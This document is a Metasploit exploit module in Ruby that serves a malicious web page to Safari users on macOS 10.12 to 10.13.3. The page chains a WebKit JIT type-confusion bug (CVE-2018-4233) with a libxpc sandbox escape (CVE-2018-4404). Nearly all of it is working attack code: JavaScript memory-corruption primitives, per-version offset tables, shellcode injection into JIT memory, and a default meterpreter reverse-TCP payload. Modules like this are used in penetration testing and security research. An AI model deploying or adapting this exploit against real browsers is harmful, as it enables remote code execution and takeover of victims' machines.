## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Safari Proxy Object Type Confusion', 'Description' => %q{ This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. The second stage exploits a logic error in libxpc, which uses command execution via the launchd's "spawn_via_launchd" API (CVE-2018-4404). }, 'License' => MSF_LICENSE, 'Author' => [ 'saelo' ], 'References' => [ ['CVE', '2018-4233'], ['CVE', '2018-4404'], ['URL', 'https://github.com/saelo/cve-2018-4233'], ['URL', 'https://github.com/saelo/pwn2own2018'], ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], ], 'Arch' => [ ARCH_PYTHON, ARCH_CMD ], 'Platform' => 'osx', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }, 'Targets' => [ [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], ], 'DisclosureDate' => 'Mar 15 2018')) register_advanced_options([ OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]), ]) end def offset_table { '10.12.6' => { :jsc_vtab => '0x0000d8d8', :dyld_stub_loader => '0x00001168', :dlopen => '0x000027f7', :confstr => '0x00002c84', :strlen => '0x00001b40', :strlen_got => '0xdc0', }, '10.13' => { :jsc_vtab => '0x0000e5f8', :dyld_stub_loader => '0x000012a8', :dlopen => '0x00002e60', :confstr => '0x000024fc', :strlen => '0x00001440', :strlen_got => '0xee8', }, '10.13.3' => { :jsc_vtab => '0xe5e8', :dyld_stub_loader => '0x1278', :dlopen => '0x2e30', :confstr => '0x24dc', :strlen => '0x1420', :strlen_got => '0xee0', }, } end def exploit_data(directory, file) path = ::File.join Msf::Config.data_directory, 'exploits', directory, file ::File.binread path end def stage1_js stage1 = exploit_data "CVE-2018-4233", "stage1.bin" "var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);" end def stage2_js stage2 = exploit_data "CVE-2018-4404", "stage2.dylib" payload_cmd = payload.raw if target['Arch'] == ARCH_PYTHON payload_cmd = "echo \"#{payload_cmd}\" | python" end placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER') stage2[placeholder_index, payload_cmd.length] = payload_cmd "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);" end def get_offsets(user_agent) if user_agent =~ /Intel Mac OS X (.*?)\)/ version = $1.gsub("_", ".") mac_osx_version = Gem::Version.new(version) if mac_osx_version >= Gem::Version.new('10.13.4') print_warning "macOS version #{mac_osx_version} is not vulnerable" elsif mac_osx_version < Gem::Version.new('10.12') print_warning "macOS version #{mac_osx_version} is not vulnerable" elsif offset_table.key?(version) offset = offset_table[version] return <<-EOF const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]}; const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]}; const DLOPEN_OFFSET = #{offset[:dlopen]}; const CONFSTR_OFFSET = #{offset[:confstr]}; const STRLEN_OFFSET = #{offset[:strlen]}; const STRLEN_GOT_OFFSET = #{offset[:strlen_got]}; EOF else print_warning "No offsets for version #{mac_osx_version}" end else print_warning "Unexpected User-Agent" end return false end def on_request_uri(cli, request) user_agent = request['User-Agent'] print_status("Request from #{user_agent}") offsets = get_offsets(user_agent) unless offsets send_not_found(cli) return end utils = exploit_data "CVE-2018-4233", "utils.js" int64 = exploit_data "CVE-2018-4233", "int64.js" html = %Q^ <html> <body> <script> #{stage1_js} stage1.replace = function(oldVal, newVal) { for (var idx = 0; idx < this.length; idx++) { var found = true; for (var j = idx; j < idx + 8; j++) { if (this[j] != oldVal.byteAt(j - idx)) { found = false; break; } } if (found) break; } this.set(newVal.bytes(), idx); }; #{stage2_js} #{utils} #{int64} #{offsets} var ready = new Promise(function(resolve) { if (typeof(window) === 'undefined') resolve(); else window.onload = function() { resolve(); } }); ready = Promise.all([ready]); print = function(msg) { //console.log(msg); //document.body.innerText += msg + '\\n'; } // Must create this indexing type transition first, // otherwise the JIT will deoptimize later. var a = [13.37, 13.37]; a[0] = {}; var referenceFloat64Array = new Float64Array(0x1000); // // Bug: the DFG JIT does not take into account that, through the use of a // Proxy, it is possible to run arbitrary JS code during the execution of a // CreateThis operation. This makes it possible to change the structure of e.g. // an argument without causing a bailout, leading to a type confusion. // // // addrof primitive // function setupAddrof() { function InfoLeaker(a) { this.address = a[0]; } var trigger = false; var leakme = null; var arg = null; var handler = { get(target, propname) { if (trigger) arg[0] = leakme; return target[propname]; }, }; var InfoLeakerProxy = new Proxy(InfoLeaker, handler); for (var i = 0; i < 100000; i++) { new InfoLeakerProxy([1.1, 2.2, 3.3]); } trigger = true; return function(obj) { leakme = obj; arg = [1.1, 1.1]; var o = new InfoLeakerProxy(arg); return o.address; }; } // // fakeobj primitive // function setupFakeobj() { function ObjFaker(a, address) { a[0] = address; } var trigger = false; var arg = null; var handler = { get(target, propname) { if (trigger) arg[0] = {}; return target[propname]; }, }; var ObjFakerProxy = new Proxy(ObjFaker, handler); for (var i = 0; i < 100000; i++) { new ObjFakerProxy([1.1, 2.2, 3.3], 13.37); } trigger = true; return function(address) { arg = [1.1, 1.1]; var o = new ObjFakerProxy(arg, address); return arg[0]; }; } function makeJITCompiledFunction() { // Some code to avoid inlining... function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } // Force JIT compilation. for (var i = 0; i < 1000; i++) { target(i); } for (var i = 0; i < 1000; i++) { target(i); } for (var i = 0; i < 1000; i++) { target(i); } return target; } function pwn() { // Spray Float64Array structures so that structure ID 0x1000 will // be a Float64Array with very high probability var structs = []; for (var i = 0; i < 0x1000; i++) { var a = new Float64Array(1); a['prop' + i] = 1337; structs.push(a); } // Setup exploit primitives var addrofOnce = setupAddrof(); var fakeobjOnce = setupFakeobj(); // (Optional) Spray stuff to keep the background GC busy and increase reliability even further /* var stuff = []; for (var i = 0; i < 0x100000; i++) { stuff.push({foo: i}); } */ var float64MemView = new Float64Array(0x200); var uint8MemView = new Uint8Array(0x1000); // Setup container to host the fake Float64Array var jsCellHeader = new Int64([ 00, 0x10, 00, 00, // m_structureID 0x0, // m_indexingType 0x2b, // m_type 0x08, // m_flags 0x1 // m_cellState ]); var container = { jsCellHeader: jsCellHeader.asJSValue(), butterfly: null, vector: float64MemView, length: (new Int64('0x0001000000001337')).asJSValue(), mode: {}, // an empty object, we'll need that later }; // Leak address and inject fake object // RawAddr == address in float64 form var containerRawAddr = addrofOnce(container); var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16); print("[+] Fake Float64Array @ " + fakeArrayAddr); /// /// BEGIN CRITICAL SECTION /// /// Objects are corrupted, a GC would now crash the process. /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations. /// var driver = fakeobjOnce(fakeArrayAddr.asDouble()); while (!(driver instanceof Float64Array)) { jsCellHeader.assignAdd(jsCellHeader, Int64.One); container.jsCellHeader = jsCellHeader.asJSValue(); } // Get some addresses that we'll need to repair our objects. We'll abuse the .mode // property of the container to leak addresses. driver[2] = containerRawAddr; var emptyObjectRawAddr = float64MemView[6]; container.mode = referenceFloat64Array; var referenceFloat64ArrayRawAddr = float64MemView[6]; // Fixup the JSCell header of the container to make it look like an empty object. // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array. driver[2] = emptyObjectRawAddr; var header = float64MemView[0]; driver[2] = containerRawAddr; float64MemView[0] = header; // Copy the JSCell header from an existing Float64Array and set the butterfly to zero. // Also set the mode: make it look like an OversizeTypedArray for easy GC survival // (see JSGenericTypedArrayView<Adaptor>::visitChildren). driver[2] = referenceFloat64ArrayRawAddr; var header = float64MemView[0]; var length = float64MemView[3]; var mode = float64MemView[4]; driver[2] = containerRawAddr; float64MemView[2] = header; float64MemView[3] = 0; float64MemView[5] = length; float64MemView[6] = mode; // Root the container object so it isn't garbage collected. // This will allocate a butterfly for the fake object and store a reference to the container there. // The fake array itself is rooted by the memory object (closures). driver.container = container; /// /// END CRITICAL SECTION /// /// Objects are repaired, we will now survive a GC /// if (typeof(gc) !== 'undefined') gc(); memory = { read: function(addr, length) { driver[2] = memory.addrof(uint8MemView).asDouble(); float64MemView[2] = addr.asDouble(); var a = new Array(length); for (var i = 0; i < length; i++) a[i] = uint8MemView[i]; return a; }, write: function(addr, data) { driver[2] = memory.addrof(uint8MemView).asDouble(); float64MemView[2] = addr.asDouble(); for (var i = 0; i < data.length; i++) uint8MemView[i] = data[i]; }, read8: function(addr) { driver[2] = addr.asDouble(); return Int64.fromDouble(float64MemView[0]); }, write8: function(addr, value) { driver[2] = addr.asDouble(); float64MemView[0] = value.asDouble(); }, addrof: function(obj) { float64MemView.leakme = obj; var butterfly = Int64.fromDouble(driver[1]); return memory.read8(Sub(butterfly, 0x10)); }, }; print("[+] Got stable memory read/write!"); // Find binary base var funcAddr = memory.addrof(Math.sin); var executableAddr = memory.read8(Add(funcAddr, 24)); var codeAddr = memory.read8(Add(executableAddr, 24)); var vtabAddr = memory.read8(codeAddr); var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET); print("[*] JavaScriptCore.dylib @ " + jscBaseUnaligned); var jscBase = And(jscBaseUnaligned, new Int64("0x7ffffffff000")); print("[*] JavaScriptCore.dylib @ " + jscBase); var dyldStubLoaderAddr = memory.read8(jscBase); var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET); var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET)); var libCBase = Sub(strlenAddr, STRLEN_OFFSET); print("[*] dyld.dylib @ " + dyldBase); print("[*] libsystem_c.dylib @ " + libCBase); var confstrAddr = Add(libCBase, CONFSTR_OFFSET); print("[*] confstr @ " + confstrAddr); var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET); print("[*] dlopen @ " + dlopenAddr); // Patching shellcode var stage2Addr = memory.addrof(stage2); stage2Addr = memory.read8(Add(stage2Addr, 16)); print("[*] Stage 2 payload @ " + stage2Addr); stage1.replace(new Int64("0x4141414141414141"), confstrAddr); stage1.replace(new Int64("0x4242424242424242"), stage2Addr); stage1.replace(new Int64("0x4343434343434343"), new Int64(stage2.length)); stage1.replace(new Int64("0x4444444444444444"), dlopenAddr); print("[+] Shellcode patched"); // Leak JITCode pointer poison value var poison_addr = Add(jscBase, 305152); print("[*] Poison value @ " + poison_addr); var poison = memory.read8(poison_addr); print("[*] Poison value: " + poison); // Shellcode var func = makeJITCompiledFunction(); var funcAddr = memory.addrof(func); print("[+] Shellcode function object @ " + funcAddr); var executableAddr = memory.read8(Add(funcAddr, 24)); print("[+] Executable instance @ " + executableAddr); var jitCodeAddr = memory.read8(Add(executableAddr, 24)); print("[+] JITCode instance @ " + jitCodeAddr); var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32)); var codeAddr = Xor(codeAddrPoisoned, poison); print("[+] RWX memory @ " + codeAddr.toString()); print("[+] Writing shellcode..."); var origCode = memory.read(codeAddr, stage1.length); memory.write(codeAddr, stage1); print("[!] Jumping into shellcode..."); var res = func(); if (res === 0) { print("[+] Shellcode executed sucessfully!"); } else { print("[-] Shellcode failed to execute: error " + res); } memory.write(codeAddr, origCode); print("[*] Restored previous JIT code"); print("[+] We are done here, continuing WebContent process as if nothing happened =)"); if (typeof(gc) !== 'undefined') gc(); } ready.then(function() { try { pwn(); } catch (e) { print("[-] Exception caught: " + e); } }).catch(function(err) { print("[-] Initializatin failed"); }); </script> </body> </html> ^ unless datastore['DEBUG_EXPLOIT'] html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') end send_response(cli, html, {'Content-Type'=>'text/html'}) end end